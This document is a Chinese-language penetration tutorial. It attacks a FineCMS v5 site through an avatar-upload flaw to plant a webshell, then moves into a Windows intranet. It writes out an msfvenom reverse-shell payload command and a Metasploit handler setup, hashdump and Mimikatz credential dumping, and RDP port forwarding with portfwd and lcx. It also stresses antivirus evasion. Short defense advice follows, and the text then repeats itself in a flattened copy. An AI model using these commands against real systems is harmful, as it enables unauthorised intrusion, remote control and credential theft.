web渗透---windows内网渗透
字数 938 2025-08-09 22:00:49

Windows内网渗透技术详解

一、内网渗透基本思路

内网渗透主要有两种攻击路径:

  1. 外网服务器跳板攻击

    • 通过攻击外网服务器获取权限
    • 利用外网服务器作为跳板攻击内网其他服务器
    • 获取敏感数据(如系统密码)
    • 视情况安装后门实现长期控制
  2. 办公网渗透攻击

    • 通过社工攻击企业办公电脑或无线网络
    • 获取办公网数据
    • 利用办公电脑作为内网渗透入口

二、渗透测试流程详解

1. Web渗透阶段

目标系统:FineCMS v5建站系统

攻击步骤

  1. 注册新用户账号
  2. 利用会员头像上传功能漏洞:
    • 原始文件格式:0x0.png
    • 使用Burp Suite拦截修改Content-Type为image/php
  3. 上传一句话木马:
    • 验证参数:v=phpinfo();
  4. 使用中国菜刀连接:
    • 输入木马路径和密码参数
    • 获取Webshell权限

2. 权限提升阶段

在菜刀中可尝试的提权方法:

  • MOF提权:利用Windows管理对象格式文件
  • UDF提权:通过用户自定义函数
  • 启动项提权:添加恶意启动项

3. 反弹Shell获取

  1. 生成免杀木马:

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f exe > /root/Desktop/su.exe
    
  2. 通过菜刀上传su.exe到目标服务器

  3. 配置Metasploit监听:

    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lport 4444
    set lhost 192.168.10.130
    run
    
  4. 在菜刀虚拟终端执行su.exe触发反弹

4. 凭证获取技术

获取系统密码的方法:

  1. 使用hashdump获取密码哈希
  2. 加载Mimikatz模块:
    load mimikatz
    kerberos
    
  3. 分析获取的Kerberos票据

三、远程桌面控制技术

方法一:Meterpreter端口转发

  1. 执行端口转发:
    portfwd add -l 5555 -p 3389 -r 目标IP
    
  2. 本地连接:
    rdesktop -u 用户名 -p 密码 127.0.0.1:5555
    

方法二:LCX工具端口转发

  1. 靶机执行(将3389转发到攻击机5555端口):
    lcx.exe -slave 攻击机IP 5555 目标IP 3389
    
  2. 攻击机监听:
    lcx.exe -listen 5555 33891
    
  3. 连接本地转发端口:
    mstsc连接127.0.0.1:33891
    

四、关键注意事项

  1. 当目标服务器设置为"不允许连接到这台计算机"时,单纯端口转发无效
  2. 免杀技术至关重要,避免被安全软件检测
  3. 内网渗透需考虑不同系统的特有漏洞:
    • 操作系统版本漏洞
    • 中间件漏洞
    • 组件漏洞
    • 端口服务漏洞

五、防御建议

  1. 及时更新CMS系统和组件补丁
  2. 严格限制文件上传类型和内容检查
  3. 禁用不必要的系统服务
  4. 配置严格的远程访问策略
  5. 部署终端检测与响应(EDR)系统
  6. 定期审计系统日志和异常连接

通过以上技术流程,攻击者可以完成从外网渗透到内网横向移动的全过程,安全团队应针对每个环节部署相应的防御措施。

Windows内网渗透技术详解 一、内网渗透基本思路 内网渗透主要有两种攻击路径: 外网服务器跳板攻击 : 通过攻击外网服务器获取权限 利用外网服务器作为跳板攻击内网其他服务器 获取敏感数据(如系统密码) 视情况安装后门实现长期控制 办公网渗透攻击 : 通过社工攻击企业办公电脑或无线网络 获取办公网数据 利用办公电脑作为内网渗透入口 二、渗透测试流程详解 1. Web渗透阶段 目标系统 :FineCMS v5建站系统 攻击步骤 : 注册新用户账号 利用会员头像上传功能漏洞: 原始文件格式:0x0.png 使用Burp Suite拦截修改Content-Type为image/php 上传一句话木马: 验证参数: v=phpinfo(); 使用中国菜刀连接: 输入木马路径和密码参数 获取Webshell权限 2. 权限提升阶段 在菜刀中可尝试的提权方法: MOF提权 :利用Windows管理对象格式文件 UDF提权 :通过用户自定义函数 启动项提权 :添加恶意启动项 3. 反弹Shell获取 生成免杀木马: 通过菜刀上传su.exe到目标服务器 配置Metasploit监听: 在菜刀虚拟终端执行su.exe触发反弹 4. 凭证获取技术 获取系统密码的方法: 使用 hashdump 获取密码哈希 加载Mimikatz模块: 分析获取的Kerberos票据 三、远程桌面控制技术 方法一:Meterpreter端口转发 执行端口转发: 本地连接: 方法二:LCX工具端口转发 靶机执行(将3389转发到攻击机5555端口): 攻击机监听: 连接本地转发端口: 四、关键注意事项 当目标服务器设置为"不允许连接到这台计算机"时,单纯端口转发无效 免杀技术至关重要,避免被安全软件检测 内网渗透需考虑不同系统的特有漏洞: 操作系统版本漏洞 中间件漏洞 组件漏洞 端口服务漏洞 五、防御建议 及时更新CMS系统和组件补丁 严格限制文件上传类型和内容检查 禁用不必要的系统服务 配置严格的远程访问策略 部署终端检测与响应(EDR)系统 定期审计系统日志和异常连接 通过以上技术流程,攻击者可以完成从外网渗透到内网横向移动的全过程,安全团队应针对每个环节部署相应的防御措施。